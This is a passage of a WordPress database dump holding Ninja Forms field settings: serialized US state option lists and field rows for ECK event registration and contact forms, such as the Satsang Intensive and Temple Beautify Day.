Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:44;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:5:\"Texas\";s:5:\"value\";s:2:\"TX\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:45;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:4:\"Utah\";s:5:\"value\";s:2:\"UT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:46;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Vermont\";s:5:\"value\";s:2:\"VT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:47;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:8:\"Virginia\";s:5:\"value\";s:2:\"VA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:48;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:10:\"Washington\";s:5:\"value\";s:2:\"WA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}');
INSERT INTO `wpcl_nf3_field_meta` VALUES (15207,502,'key','listselect_218','key','listselect_218'),(15208,502,'parent_id','4','parent_id','4'),(15209,502,'drawerDisabled','','drawerDisabled',''),(15210,502,'idAttribute','id','idAttribute','id'),(15211,503,'editActive','','editActive',''),(15212,503,'field_label','Country','field_label','Country'),(15213,503,'field_key','listcountry_219','field_key','listcountry_219'),(15214,503,'container_class','one-half','container_class','one-half'),(15215,503,'value','US','value','US'),(15216,503,'type','listcountry','type','listcountry'),(15217,503,'order','9','order','9'),(15218,503,'fav_id','','fav_id',''),(15219,503,'def_id','13','def_id','13'),(15220,503,'label','Country','label','Country'),(15221,503,'label_pos','above','label_pos','above'),(15222,503,'default_value','US','default_value','US'),(15223,503,'user_info_field_group','1','user_info_field_group','1'),(15224,503,'show_help','0','show_help','0'),(15225,503,'help_text','','help_text',''),(15226,503,'calc_auto_include','0','calc_auto_include','0'),(15227,503,'calc_option','0','calc_option','0'),(15228,503,'country_use_custom_first','1','country_use_custom_first','1'),(15229,503,'country_custom_first','Colorado','country_custom_first','Colorado'),(15230,503,'num_sort','0','num_sort','0'),(15231,503,'admin_label','','admin_label',''),(15232,503,'user_info_field_group_name','','user_info_field_group_name',''),(15233,503,'user_info_field_group_custom','','user_info_field_group_custom',''),(15234,503,'show_desc','0','show_desc','0'),(15235,503,'desc_pos','none','desc_pos','none'),(15236,503,'desc_text','','desc_text',''),(15237,503,'element_class','','element_class',''),(15238,503,'required','0','required','0'),(15239,503,'default','US','default','US'),(15240,503,'options','a:0:{}','options','a:0:{}'),(15241,503,'key','listcountry_219','key','listcountry_219'),(15242,503,'parent_id','4','parent_id','4'),(15243,503,'idAttribute','id','idAttribute','id'),(15244,503,'drawerDisabled','','drawerDisabled',''),(15245,504,'editActive','','editActive',''),(15246,504,'field_label','hr','field_label','hr'),(15247,504,'field_key','hr_207','field_key','hr_207'),(15248,504,'container_class','','container_class',''),(15249,504,'type','hr','type','hr'),(15250,504,'order','10','order','10'),(15251,504,'fav_id','','fav_id',''),(15252,504,'def_id','','def_id',''),(15253,504,'label','hr','label','hr'),(15254,504,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(15255,504,'show_desc','0','show_desc','0'),(15256,504,'desc_pos','none','desc_pos','none'),(15257,504,'desc_text','','desc_text',''),(15258,504,'element_class','','element_class',''),(15259,504,'key','hr_207','key','hr_207'),(15260,504,'parent_id','4','parent_id','4'),(15261,504,'idAttribute','id','idAttribute','id'),(15262,505,'editActive','','editActive',''),(15263,505,'field_label','If You Have Comments To Add - Please Enter Them Here','field_label','If You Have Comments To Add - Please Enter Them Here'),(15264,505,'field_key','textarea_210','field_key','textarea_210'),(15265,505,'placeholder','','placeholder',''),(15266,505,'container_class','','container_class',''),(15267,505,'manual_key','','manual_key',''),(15268,505,'value','','value',''),(15269,505,'type','textarea','type','textarea'),(15270,505,'order','11','order','11'),(15271,505,'fav_id','','fav_id',''),(15272,505,'def_id','','def_id',''),(15273,505,'label','If You Have Comments To Add - Please Enter Them Here','label','If You Have Comments To Add - Please Enter Them Here'),(15274,505,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(15275,505,'label_pos','above','label_pos','above'),(15276,505,'default_value','','default_value',''),(15277,505,'textarea_rte','0','textarea_rte','0'),(15278,505,'textarea_media','0','textarea_media','0'),(15279,505,'disable_rte_mobile','0','disable_rte_mobile','0'),(15280,505,'input_limit','','input_limit',''),(15281,505,'input_limit_type','char','input_limit_type','char'),(15282,505,'calc_auto_include','0','calc_auto_include','0'),(15283,505,'num_sort','0','num_sort','0'),(15284,505,'admin_label','','admin_label',''),(15285,505,'show_help','0','show_help','0'),(15286,505,'help_text','','help_text',''),(15287,505,'show_desc','0','show_desc','0'),(15288,505,'desc_pos','none','desc_pos','none'),(15289,505,'desc_text','','desc_text',''),(15290,505,'element_class','','element_class',''),(15291,505,'required','0','required','0'),(15292,505,'default','','default',''),(15293,505,'key','textarea_210','key','textarea_210'),(15294,505,'parent_id','4','parent_id','4'),(15295,505,'idAttribute','id','idAttribute','id'),(17066,600,'last_name','0','last_name','0'),(17065,600,'first_name','1','first_name','1'),(17063,600,'mask','','mask',''),(17064,600,'datepicker','0','datepicker','0'),(17353,609,'type','html','type','html'),(17354,609,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17352,609,'label','HTML','label','HTML'),(17349,609,'editActive','','editActive',''),(17350,609,'order','9','order','9'),(17351,609,'idAttribute','id','idAttribute','id'),(15316,507,'editActive','','editActive',''),(15317,507,'field_label','Submit','field_label','Submit'),(15318,507,'field_key','submit_212','field_key','submit_212'),(15319,507,'container_class','','container_class',''),(15320,507,'type','submit','type','submit'),(15321,507,'order','13','order','13'),(15322,507,'fav_id','','fav_id',''),(15323,507,'def_id','','def_id',''),(15324,507,'label','Submit','label','Submit'),(15325,507,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(15326,507,'show_help','0','show_help','0'),(15327,507,'help_text','','help_text',''),(15328,507,'show_desc','0','show_desc','0'),(15329,507,'desc_pos','none','desc_pos','none'),(15330,507,'desc_text','','desc_text',''),(15331,507,'processing_label','Processing','processing_label','Processing'),(15332,507,'element_class','','element_class',''),(15333,507,'key','submit_212','key','submit_212'),(15334,507,'parent_id','4','parent_id','4'),(15335,507,'idAttribute','id','idAttribute','id'),(15336,508,'objectType','Field','objectType','Field'),(15337,508,'objectDomain','fields','objectDomain','fields'),(15338,508,'editActive','','editActive',''),(15339,508,'order','1','order','1'),(15340,508,'idAttribute','id','idAttribute','id'),(15341,508,'label','Statewide Satsang Intensive Registration','label','Statewide Satsang Intensive Registration'),(15342,508,'key','statewide_satsang_intensive_registration_1646235944769','key','statewide_satsang_intensive_registration_1646235944769'),(15343,508,'type','html','type','html'),(15344,508,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15345,508,'default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Satsang Intensive Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>','default','<p style=\"font-size: 23px; margin-bottom: -10px !important; color:#23507D;font-weight:strong;\">Satsang Intensive Registration</p><p style=\"font-size: 16px; margin-bottom: -10px !important; color:#333333;font-weight:strong;\">After registration, you will receive event login information via email.<br></p>'),(15346,508,'container_class','','container_class',''),(15347,508,'element_class','','element_class',''),(15348,508,'field_label','ECK Light and Sound Service Registration','field_label','ECK Light and Sound Service Registration'),(15349,508,'field_key','eck_light_and_sound_service_registration_1620150522553','field_key','eck_light_and_sound_service_registration_1620150522553'),(15350,508,'drawerDisabled','','drawerDisabled',''),(15351,508,'parent_id','44','parent_id','44'),(15352,509,'key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(15353,509,'element_class','','element_class',''),(15354,509,'container_class','','container_class',''),(15355,509,'editActive','','editActive',''),(15356,509,'order','8','order','8'),(15357,509,'idAttribute','id','idAttribute','id'),(15358,509,'label','','label',''),(15359,509,'type','html','type','html'),(15360,509,'default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>','default','<p>Your email address and other information will not be shared with any third parties for any reason. It will only be used to respond to your request.<br></p>'),(15361,509,'drawerDisabled','','drawerDisabled',''),(15362,509,'field_label','','field_label',''),(15363,509,'field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662','field_key','your_email_address_and_other_information_will_not_be_shared_with_any_third_parties_for_any_reason_it_will_only_be_used_to_respond_to_your_request_1617158441662'),(15364,510,'objectType','Field','objectType','Field'),(15365,510,'objectDomain','fields','objectDomain','fields'),(15366,510,'editActive','','editActive',''),(15367,510,'order','2','order','2'),(15368,510,'idAttribute','id','idAttribute','id'),(15369,510,'label','Divider','label','Divider'),(15370,510,'key','hr','key','hr'),(15371,510,'type','hr','type','hr'),(15372,510,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15373,510,'container_class','','container_class',''),(15374,510,'element_class','','element_class',''),(15375,510,'field_label','Divider','field_label','Divider'),(15376,510,'field_key','hr','field_key','hr'),(15377,510,'parent_id','44','parent_id','44'),(15378,511,'drawerDisabled','','drawerDisabled',''),(15379,511,'objectType','Field','objectType','Field'),(15380,511,'objectDomain','fields','objectDomain','fields'),(15381,511,'editActive','','editActive',''),(15382,511,'order','3','order','3'),(15383,511,'idAttribute','id','idAttribute','id'),(15384,511,'label','First Name','label','First Name'),(15385,511,'key','firstname','key','firstname'),(15386,511,'type','firstname','type','firstname'),(15387,511,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15388,511,'label_pos','default','label_pos','default'),(15389,511,'required','1','required','1'),(15390,511,'default','','default',''),(15391,511,'placeholder','','placeholder',''),(15392,511,'container_class','','container_class',''),(15393,511,'element_class','','element_class',''),(15394,511,'admin_label','','admin_label',''),(15395,511,'help_text','','help_text',''),(15396,511,'desc_text','','desc_text',''),(15397,511,'field_label','First Name','field_label','First Name'),(15398,511,'field_key','firstname','field_key','firstname'),(15399,511,'custom_name_attribute','fname','custom_name_attribute','fname'),(15400,511,'personally_identifiable','1','personally_identifiable','1'),(15401,511,'value','','value',''),(15402,511,'parent_id','44','parent_id','44'),(15403,512,'objectType','Field','objectType','Field'),(15404,512,'objectDomain','fields','objectDomain','fields'),(15405,512,'editActive','','editActive',''),(15406,512,'order','4','order','4'),(15407,512,'idAttribute','id','idAttribute','id'),(15408,512,'label','Last Name','label','Last Name'),(15409,512,'key','lastname','key','lastname'),(15410,512,'type','lastname','type','lastname'),(15411,512,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15412,512,'label_pos','default','label_pos','default'),(15413,512,'required','1','required','1'),(15414,512,'default','','default',''),(15415,512,'placeholder','','placeholder',''),(15416,512,'container_class','','container_class',''),(15417,512,'element_class','','element_class',''),(15418,512,'admin_label','','admin_label',''),(15419,512,'help_text','','help_text',''),(15420,512,'desc_text','','desc_text',''),(15421,512,'field_label','Last Name','field_label','Last Name'),(15422,512,'field_key','lastname','field_key','lastname'),(15423,512,'custom_name_attribute','lname','custom_name_attribute','lname'),(15424,512,'personally_identifiable','1','personally_identifiable','1'),(15425,512,'value','','value',''),(15426,512,'drawerDisabled','','drawerDisabled',''),(15427,512,'parent_id','44','parent_id','44'),(15428,513,'objectType','Field','objectType','Field'),(15429,513,'objectDomain','fields','objectDomain','fields'),(15430,513,'editActive','','editActive',''),(15431,513,'order','5','order','5'),(15432,513,'idAttribute','id','idAttribute','id'),(15433,513,'label','Email','label','Email'),(15434,513,'key','email','key','email'),(15435,513,'type','email','type','email'),(15436,513,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15437,513,'label_pos','default','label_pos','default'),(15438,513,'required','1','required','1'),(15439,513,'default','','default',''),(15440,513,'placeholder','','placeholder',''),(15441,513,'container_class','one-half first','container_class','one-half first'),(15442,513,'element_class','','element_class',''),(15443,513,'admin_label','','admin_label',''),(15444,513,'help_text','','help_text',''),(15445,513,'desc_text','','desc_text',''),(15446,513,'field_label','Email','field_label','Email'),(15447,513,'field_key','email','field_key','email'),(15448,513,'custom_name_attribute','email','custom_name_attribute','email'),(15449,513,'personally_identifiable','1','personally_identifiable','1'),(15450,513,'value','','value',''),(15451,513,'parent_id','44','parent_id','44'),(15452,513,'drawerDisabled','','drawerDisabled',''),(15453,514,'drawerDisabled','','drawerDisabled',''),(15454,514,'objectType','Field','objectType','Field'),(15455,514,'objectDomain','fields','objectDomain','fields'),(15456,514,'editActive','','editActive',''),(15457,514,'order','9','order','9'),(15458,514,'idAttribute','id','idAttribute','id'),(15459,514,'label','Submit','label','Submit'),(15460,514,'key','submit_1618628929218','key','submit_1618628929218'),(15461,514,'type','submit','type','submit'),(15462,514,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15463,514,'processing_label','Processing','processing_label','Processing'),(15464,514,'container_class','','container_class',''),(15465,514,'element_class','','element_class',''),(15466,514,'field_label','Submit','field_label','Submit'),(15467,514,'field_key','submit_1618628929218','field_key','submit_1618628929218'),(15468,514,'parent_id','44','parent_id','44'),(15469,515,'objectType','Field','objectType','Field'),(15470,515,'objectDomain','fields','objectDomain','fields'),(15471,515,'editActive','','editActive',''),(15472,515,'order','1','order','1'),(15473,515,'label','ECK Temple Beautify Day','label','ECK Temple Beautify Day'),(15474,515,'key','eck_temple_beautify_day_1649193811532','key','eck_temple_beautify_day_1649193811532'),(15475,515,'type','html','type','html'),(15476,515,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 16:16:05'),(15477,515,'default','<p style:\"font-size:18px;=\"\" color:#26507d;\"=\"\">Thanks for getting in touch with us about \'Beautify Day\' on May 14th at the ECK Temple!</p><p>If you would like more information or have questions about the event, just fill out the form below.<br></p>','default','<p style:\"font-size:18px;=\"\" color:#26507d;\"=\"\">Thanks for getting in touch with us about \'Beautify Day\' on May 14th at the ECK Temple!</p><p>If you would like more information or have questions about the event, just fill out the form below.<br></p>'),(15478,515,'container_class','','container_class',''),(15479,515,'element_class','','element_class',''),(15480,515,'field_label','Event Intro Description','field_label','Event Intro Description'),(15481,515,'field_key','event_intro_description','field_key','event_intro_description'),(15482,515,'parent_id','55','parent_id','55'),(15483,516,'objectType','Field','objectType','Field'),(15484,516,'objectDomain','fields','objectDomain','fields'),(15485,516,'editActive','','editActive',''),(15486,516,'order','2','order','2'),(15487,516,'label','Divider','label','Divider'),(15488,516,'key','hr','key','hr'),(15489,516,'type','hr','type','hr'),(15490,516,'created_at','2016-08-28 16:16:05','created_at','2016-08-28 